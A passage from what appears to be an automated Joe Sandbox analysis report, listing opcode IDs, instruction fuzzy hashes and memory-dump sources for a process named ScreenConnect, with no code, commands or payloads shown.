                                                                                                                          • API String ID: 0-149360118
                                                                                                                          • Opcode ID: 8cef29af0211e85926a1aae1bc94f8f116e056334b72de30970a101817f4cef1
                                                                                                                          • Instruction ID: bdb73d9e94a762787c125f0c01d259e3b6f9d0d6bfc5cf5b1e1203bfb08fa2fb
                                                                                                                          • Opcode Fuzzy Hash: 8cef29af0211e85926a1aae1bc94f8f116e056334b72de30970a101817f4cef1
                                                                                                                          • Instruction Fuzzy Hash: 94614774B106099FCB04DFA9D894A6EB7F2FF8E305B1084A8E5069B324DB30ED01DB90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: LR^q
                                                                                                                          • API String ID: 0-2625958711
                                                                                                                          • Opcode ID: 5725ef9c35b2200831c2867f056f4f267ce28fdbfda6bc8bd83d9390459b35cf
                                                                                                                          • Instruction ID: f9833030a93dd5b5d3a419b35ef1fc6efd32b2d398217395b6f37b05f61e940b
                                                                                                                          • Opcode Fuzzy Hash: 5725ef9c35b2200831c2867f056f4f267ce28fdbfda6bc8bd83d9390459b35cf
                                                                                                                          • Instruction Fuzzy Hash: 5051F430B042129FDB159B74DC64B6EBBF2BF85708F148A6AE456DB2A1DF309C45CB81
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (bq
                                                                                                                          • API String ID: 0-149360118
                                                                                                                          • Opcode ID: c6e87eedbed564c83c0d69305490bc9ddccd76f3d1a6d105fdc5c86adb750fb6
                                                                                                                          • Instruction ID: ce17d0651939690c8f52a68903f86f4ceb15c2ab054602ad26a2b49a35751eb5
                                                                                                                          • Opcode Fuzzy Hash: c6e87eedbed564c83c0d69305490bc9ddccd76f3d1a6d105fdc5c86adb750fb6
                                                                                                                          • Instruction Fuzzy Hash: 5241BF31A0011A8BCF18EF68D4946ADBBA2EFC4315F14C56AD91A9B255DF74ED02CB90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ['
                                                                                                                          • API String ID: 0-410297704
                                                                                                                          • Opcode ID: 255a8bb2bd801a6a36c2d13983436022f9a62413ce50c48400e8f1d3f01ec183
                                                                                                                          • Instruction ID: 41e34f8f35b08f9c74625eb19f7fbc634cd65b2fcd1f9ba20e4a7a848bbab4de
                                                                                                                          • Opcode Fuzzy Hash: 255a8bb2bd801a6a36c2d13983436022f9a62413ce50c48400e8f1d3f01ec183
                                                                                                                          • Instruction Fuzzy Hash: 7D311871B003115FD701AB7C986056E7BE6EF85700394856AE819EB354FFB0EE058BD0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7d718904eefa142d18605a1304b8a612eb0d032061b4231e84f2db52cefa69c6
                                                                                                                          • Instruction ID: 1bebc6b319e53714b1da3859080579c4bfef8d52a6232ce175a8e91ff05a547f
                                                                                                                          • Opcode Fuzzy Hash: 7d718904eefa142d18605a1304b8a612eb0d032061b4231e84f2db52cefa69c6
                                                                                                                          • Instruction Fuzzy Hash: AE512C342007068FC728DF2AD894A16B7F2FF8D325B144A5DD4969B7A4DB71ED41CB44
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 359de9695d6869c498390e4884a9d603a03a6b15c6d9a9894c0fa5f10043ebed
                                                                                                                          • Instruction ID: e5498fdad13f9756d6876aaa864b92e053f4dc477eb215ddea1c6eca41801e30
                                                                                                                          • Opcode Fuzzy Hash: 359de9695d6869c498390e4884a9d603a03a6b15c6d9a9894c0fa5f10043ebed
                                                                                                                          • Instruction Fuzzy Hash: 76515A70E103199FDB01EFB8D844B9DBBF1EF89300F209659E118AB254DB75A985CB90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: acb5a84dc7c6960a00a388c1ab67bb830b7c07133c5d3e5df610020b7f4d8727
                                                                                                                          • Instruction ID: 564795969551b0c5c40f2175d25fde17f279001c9eca33aa99bc57ce7e696ab6
                                                                                                                          • Opcode Fuzzy Hash: acb5a84dc7c6960a00a388c1ab67bb830b7c07133c5d3e5df610020b7f4d8727
                                                                                                                          • Instruction Fuzzy Hash: B5515970E103199FDB01EFA8D844B9DBBF2EF89300F209659E118BB254DB75A985CB90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7925987a1d415dcd55086ad9bc5bda8db539d2f6c38d5a5030aae5ef4ba90be3
                                                                                                                          • Instruction ID: dc79fe3815fb4af7945fbb67632939fc633904051b59abe6b7f543668c2d0909
                                                                                                                          • Opcode Fuzzy Hash: 7925987a1d415dcd55086ad9bc5bda8db539d2f6c38d5a5030aae5ef4ba90be3
                                                                                                                          • Instruction Fuzzy Hash: 4641A1B4600746CFCB20DF29D96465ABBF1FF45715B204A69E466CB3A0EB30EE45CB90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 87e0d1af38c2d64a91f8067dd5c7d05356d155f25695c18c98e157dc953faa8b
                                                                                                                          • Instruction ID: 2502d63f7bec185f8ab692b6ae594376d79ecc7d2e65e2d7b9bc2dfc25f5b4b0
                                                                                                                          • Opcode Fuzzy Hash: 87e0d1af38c2d64a91f8067dd5c7d05356d155f25695c18c98e157dc953faa8b
                                                                                                                          • Instruction Fuzzy Hash: EB419FB46007468FCB20DF39D964A5AB7F1FF49715B204A29E056CB7A0EB30EE45CB90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ced373546a1080f87a0598a44db0464591fb94f794bea6e027f695e63af83f0d
                                                                                                                          • Instruction ID: 9dd7aded175f2d6e3d75063492f28aa8ea6757b02fdfb74f60ff8bbc6280d0e9
                                                                                                                          • Opcode Fuzzy Hash: ced373546a1080f87a0598a44db0464591fb94f794bea6e027f695e63af83f0d
                                                                                                                          • Instruction Fuzzy Hash: 40316D30B002068FDB149F69C4686AEF7F5EF8A358F14846AE416EB750DB70DE048B90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 24949fb4a6ec558ddd3459a2bacceb8ab91903197afc577cdaf666bce99e002c
                                                                                                                          • Instruction ID: dd652312711584f7dd4dfee8e3d17153da8a29e89b630648f5276eb47e70c0b4
                                                                                                                          • Opcode Fuzzy Hash: 24949fb4a6ec558ddd3459a2bacceb8ab91903197afc577cdaf666bce99e002c
                                                                                                                          • Instruction Fuzzy Hash: DF31F871B042859FC711DB68C86456EFFB2EF86310B1480BAD545DB391DB30DE05C7A1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5c308ecb53b2550110bceae4f79f49cef5110838a70c6d097a4f2179e8b693fa
                                                                                                                          • Instruction ID: 12ac6e91325a045992dc2fe9ae384ca63ce428cbcb68fc72eb6f811ffc5fc0da
                                                                                                                          • Opcode Fuzzy Hash: 5c308ecb53b2550110bceae4f79f49cef5110838a70c6d097a4f2179e8b693fa
                                                                                                                          • Instruction Fuzzy Hash: F1311070600B058FC730DF29D884656B7F2EF89325B548A1DD456DB7A0D730E945CB91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7289006842d184278ae81b4f15b6217a6c9806d65f36fa179581e0364016a166
                                                                                                                          • Instruction ID: 94caa847ec3cbf924e44c8cb8e9d0d9a0c833d056cd2e1f98a709ff8a6c6f942
                                                                                                                          • Opcode Fuzzy Hash: 7289006842d184278ae81b4f15b6217a6c9806d65f36fa179581e0364016a166
                                                                                                                          • Instruction Fuzzy Hash: A021D671E01B06DFDB20CF65D8006AABBB6EF82324F44C56AE555CB2A0E7319E05CB91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 059b85aa34e05060717fc3ca81e4f389d563ef35db661712bd7dde41fa241077
                                                                                                                          • Instruction ID: de2dbfd0523370f4d6cf48448b8e01d518f2be60642fca61b088efe549db59ff
                                                                                                                          • Opcode Fuzzy Hash: 059b85aa34e05060717fc3ca81e4f389d563ef35db661712bd7dde41fa241077
                                                                                                                          • Instruction Fuzzy Hash: C121D674F092858FCB06CB69C86456EFFB2EF86314B1540ABE8459B3A2DB349D05C7A1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9e7314fcd6426f5032a437aa31a565af7d7d1e7d8b67bb678e43f7f19d1142e0
                                                                                                                          • Instruction ID: 9d1effe89602a67edb0d246dfce5ed5be358c6b15b8c39c16cc46478a50e6e28
                                                                                                                          • Opcode Fuzzy Hash: 9e7314fcd6426f5032a437aa31a565af7d7d1e7d8b67bb678e43f7f19d1142e0
                                                                                                                          • Instruction Fuzzy Hash: 9111E631300B419FD72086AE8D41A56BBEADFD6759B28C576F529CB651EA30EC028790
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 16ce0d1721a17b6e13f7f9753d91da17191dd24611d747b28ae2489fdc3f79e7
                                                                                                                          • Instruction ID: 156e82fd344abb9f39949a3ddae873c5b4987ea5219e5552ce663184bc0267d9
                                                                                                                          • Opcode Fuzzy Hash: 16ce0d1721a17b6e13f7f9753d91da17191dd24611d747b28ae2489fdc3f79e7
                                                                                                                          • Instruction Fuzzy Hash: FE11D5717002115BD700EB68E8407AEBBE2EFC5700F848966E509AB355DFB0BE05CBE1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2c6a4fa57c5dae492303a0385abac459e366a23d4bef1906ba0533012be1e4a4
                                                                                                                          • Instruction ID: 573b73f8295569581682ab8fd7729acb6f58ab0fd75f4d993de3241147fc162a
                                                                                                                          • Opcode Fuzzy Hash: 2c6a4fa57c5dae492303a0385abac459e366a23d4bef1906ba0533012be1e4a4
                                                                                                                          • Instruction Fuzzy Hash: 0C213E302007059FC738DF26D85869AB7F1EF85325F108B2DD4A6976A1EB71E94ACF90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 877ea537b67839e295cb7fb00a0779692cef6e68f7dc1f10ff9bb966faa062f7
                                                                                                                          • Instruction ID: 4083341ae16372f9383c980b66a4e6b002f76e13c27c983e152d5a4acbfd33f6
                                                                                                                          • Opcode Fuzzy Hash: 877ea537b67839e295cb7fb00a0779692cef6e68f7dc1f10ff9bb966faa062f7
                                                                                                                          • Instruction Fuzzy Hash: 3511E6717002105BD704EB68D841BAEB7E2EFC4700F94896AE519AB354DFB0BE0587D1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 98561aa189cd7fd67919e38ab1ebe7859fcbd2c4835b2b2193cd5e438132bed1
                                                                                                                          • Instruction ID: 98c2c42fcea48253d8c8470c86f063487d56e7e6a093d1785d5abf2c865b1977
                                                                                                                          • Opcode Fuzzy Hash: 98561aa189cd7fd67919e38ab1ebe7859fcbd2c4835b2b2193cd5e438132bed1
                                                                                                                          • Instruction Fuzzy Hash: 8411427690020A9FDF00DFA8C8409DEBBF5EF49314F108565E605BB260D771BA06CBA0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a82382e110e777ee940d87940303d474c948233db097f42bbce05ac37e71c487
                                                                                                                          • Instruction ID: 05b669b36b9b0bc4ac354dff507019c65f380f9e412cf8ca004a2d745e21f50e
                                                                                                                          • Opcode Fuzzy Hash: a82382e110e777ee940d87940303d474c948233db097f42bbce05ac37e71c487
                                                                                                                          • Instruction Fuzzy Hash: 41118B70F0060AAFDB14CA69C800AAFBBB6AFC5310F54C56AE614D7254EB719E01CB90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: dea0861f9a738266709728d6ed96d019da5ad5df4044afc66006c34d2beb8437
                                                                                                                          • Instruction ID: 9dcc4eb1e9003725b88518f421efe77a23b9e4f4ac8df764bd6b29fad4c26c09
                                                                                                                          • Opcode Fuzzy Hash: dea0861f9a738266709728d6ed96d019da5ad5df4044afc66006c34d2beb8437
                                                                                                                          • Instruction Fuzzy Hash: CB11587190011ADFCB01DFA8D4808DCBFB2FF86318B58C455E109AB125DB31AA46CBA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9a46a17430aadf8c07c3bc5640a7a15263218e0430dfb36a091538c02ac0cf7f
                                                                                                                          • Instruction ID: 0bc32bd4d02802b32806af4bb34e0453c526bf36a79c27db5853ec3df915e6d2
                                                                                                                          • Opcode Fuzzy Hash: 9a46a17430aadf8c07c3bc5640a7a15263218e0430dfb36a091538c02ac0cf7f
                                                                                                                          • Instruction Fuzzy Hash: D10122355002048FCB16CF64C849ACA7BF0EF8A328F0088A9D94697611C7B2E80ACF90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: bd74ad70234dd8c0c2c5bbffe01bbf81cd0b4d1376e2bd797b6ef0e2c9e2fb52
                                                                                                                          • Instruction ID: 22b9ea2702475e32d332b194d55305cafd878a47a37cc54b37fa5de49d65ff44
                                                                                                                          • Opcode Fuzzy Hash: bd74ad70234dd8c0c2c5bbffe01bbf81cd0b4d1376e2bd797b6ef0e2c9e2fb52
                                                                                                                          • Instruction Fuzzy Hash: B111167690020A9FCF00DFA8D9409DEBBF5FF49314B508555D609BB261D771BA05CB90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f201f3d8cefd76ea8d13229004e64ca72f2014a437ef95e4d78713d0363b9ae6
                                                                                                                          • Instruction ID: cbc0699815aa25f8fead172dcf2123dce961eadd01941920b79b3c4446fe1941
                                                                                                                          • Opcode Fuzzy Hash: f201f3d8cefd76ea8d13229004e64ca72f2014a437ef95e4d78713d0363b9ae6
                                                                                                                          • Instruction Fuzzy Hash: 90012B76B042219F8B048B59D8440ABBBE9EBC83153284D6BE415DB310DBB1ED028BD4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964300054.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_bbd000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fb300f0c1a4fbd894abe17354827921155614a0baf1b6df9587b1ad376d98cb2
                                                                                                                          • Instruction ID: 68410a09c6144135d251b8c743f6918ce55af01944795cacd4067c81e4408220
                                                                                                                          • Opcode Fuzzy Hash: fb300f0c1a4fbd894abe17354827921155614a0baf1b6df9587b1ad376d98cb2
                                                                                                                          • Instruction Fuzzy Hash: 5801F7711043409BE7206A15CCC4BB6BFD8DF55325F18C599ED4D0B282D2BD9841C6B1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964300054.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_bbd000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f665421597b6addc1c6c782e5e6f9dcfa694d832a9d9a6bec535d159830f84e2
                                                                                                                          • Instruction ID: 070db5cc8bb34bca3ea0bafb282b56c91f6ad962454cfd4c891871183b53214d
                                                                                                                          • Opcode Fuzzy Hash: f665421597b6addc1c6c782e5e6f9dcfa694d832a9d9a6bec535d159830f84e2
                                                                                                                          • Instruction Fuzzy Hash: 6201526150D3C09FD7124B258C94B62BFB4DF53224F1981DBED888F1D3D2695844C772
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1fde64b6525ef5d766628eaa05c53b8c82f011b255fa7a431bc53fa4353b481b
                                                                                                                          • Instruction ID: bab276c7984066c44e297ef74fced723f9a4a641f7e953906141a2c101a6f698
                                                                                                                          • Opcode Fuzzy Hash: 1fde64b6525ef5d766628eaa05c53b8c82f011b255fa7a431bc53fa4353b481b
                                                                                                                          • Instruction Fuzzy Hash: E2012832D0015A9BCB04DFA9E9048CDBFF2EF89314F45856AE90977260DB707916CBA0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e90e921a7704ece83e00c2c1fa25a5f8af980bdb2553da892af6be0afd190c99
                                                                                                                          • Instruction ID: 3943d88bc3d5b255b0931d496689ac60d1ddfd2eb4edb7aa72807bf563075acd
                                                                                                                          • Opcode Fuzzy Hash: e90e921a7704ece83e00c2c1fa25a5f8af980bdb2553da892af6be0afd190c99
                                                                                                                          • Instruction Fuzzy Hash: 68F05836B082146BD728CABAA80069BBBDACBD4624B14807FE59DC3680E931A9018765
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cd1990764420992be8eac57cbaad59380da40699e1bcfce196bb45f8c872256f
                                                                                                                          • Instruction ID: 471304c7e503d4fb0577be7678d709d747a9210fb4e18ac02951ceb59734dd11
                                                                                                                          • Opcode Fuzzy Hash: cd1990764420992be8eac57cbaad59380da40699e1bcfce196bb45f8c872256f
                                                                                                                          • Instruction Fuzzy Hash: C4F0467200C3908FD302877CE8212983FE1DE6330174809CBD046CB562D659A90AC721
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 19b78d1714e592d41f91eb7b5a5849a79a283294ed2c9f39d3814005fc857986
                                                                                                                          • Instruction ID: e1562100e9306231814463aedb9544d5ff972e48491221f31c318eeec956f8fb
                                                                                                                          • Opcode Fuzzy Hash: 19b78d1714e592d41f91eb7b5a5849a79a283294ed2c9f39d3814005fc857986
                                                                                                                          • Instruction Fuzzy Hash: 74F0ED32702E529F9B0146989C08051BBE98B6B329369C6A2F426CF252F630CC0287A1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0498c20dcd7b246609f484d93179562bbf8e9d4ed1678601f500aaea9b09e12d
                                                                                                                          • Instruction ID: a521a48dce4bafe8e3ea1896128fa54c48977d621ff19a37e2ff63af8649604f
                                                                                                                          • Opcode Fuzzy Hash: 0498c20dcd7b246609f484d93179562bbf8e9d4ed1678601f500aaea9b09e12d
                                                                                                                          • Instruction Fuzzy Hash: 24F0E9352087505FC703972CA821A5F3BF5DFC671175844AFE865CB355DB309D058BA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2dafdf45c760ceeb5cdacbea73d5b805966cebeb912eee15f2e17b88fd70281f
                                                                                                                          • Instruction ID: 936d86b0e66316cf2fd18e98d3f050712e457b06f775a4745ed52ef8c9b9a5e7
                                                                                                                          • Opcode Fuzzy Hash: 2dafdf45c760ceeb5cdacbea73d5b805966cebeb912eee15f2e17b88fd70281f
                                                                                                                          • Instruction Fuzzy Hash: E3F058B290E3949FD702DB789C115987FF0EA57301B5901DBD488DB297DA244A05E722
                                                                                                                          Memory Dump Source
